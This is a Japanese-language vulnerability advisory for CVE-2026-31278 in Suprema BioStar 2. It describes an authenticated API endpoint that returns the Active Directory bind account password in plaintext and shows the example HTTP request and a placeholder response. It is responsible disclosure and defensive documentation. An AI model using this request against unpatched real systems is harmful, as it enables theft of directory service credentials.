
| フィールド | 詳細 |
|---|---|
| CVE ID | CVE-2026-31278 |
| ベンダー | Suprema Inc. |
| 製品 | BioStar 2 |
| 脆弱性タイプ | 機密情報の開示 / 資格情報の露出 |
| 攻撃ベクトル | リモート / 認証済み / 低複雑性 |
| 深刻度 | 高 |
| 修正バージョン | BioStar 2 v2.9.12 / BioStarX v1.0.2 |
| 研究者 | Abdullah Alannaz |
Suprema BioStar 2 には、Active Directory 統合設定の不適切な処理に起因する機密情報の開示の脆弱性が存在します。バックエンド API エンドポイント /api/v2/setting/adserversetting は、管理 UI でパスワードがマスクされているにもかかわらず、Active Directory バインドアカウントの資格情報を平文で返します。
管理インターフェースではパスワードフィールドがマスクされていますが、バックエンド API への認証済みリクエストにより、無効化された SSL 通信を含む LDAP 設定パラメータとともに、完全な暗号化されていないパスワードが開示されます。
認証済みの攻撃者は、AD サーバー設定エンドポイントに HTTP GET リクエストを送信し、サーバーレスポンス内で Active Directory サービスアカウントのパスワードを平文で取得します。
リクエスト:
GET /api/v2/setting/adserversetting HTTP/1.1
Host: <target>
Authorization: Bearer <token>
レスポンス:
{
"ad_server": "ldap://internal.domain.local",
"bind_dn": "CN=svc_biostar,DC=domain,DC=local",
"password": "<plaintext_password_returned_here>",
"ssl_enabled": false
}
認証済みの攻撃者は、開示された資格情報を利用して以下のことが可能になる可能性があります:
CVE-2026-31278 は MITRE によって割り当てられました | 修正版 BioStar 2 v2.9.12 / BioStarX v1.0.2 がリリースされました |
Abdullah Alannaz セキュリティリサーチャー
この脆弱性は Suprema に責任を持って開示されました。ベンダーは問題を確認し、CVE 割り当てについて MITRE と調整しました。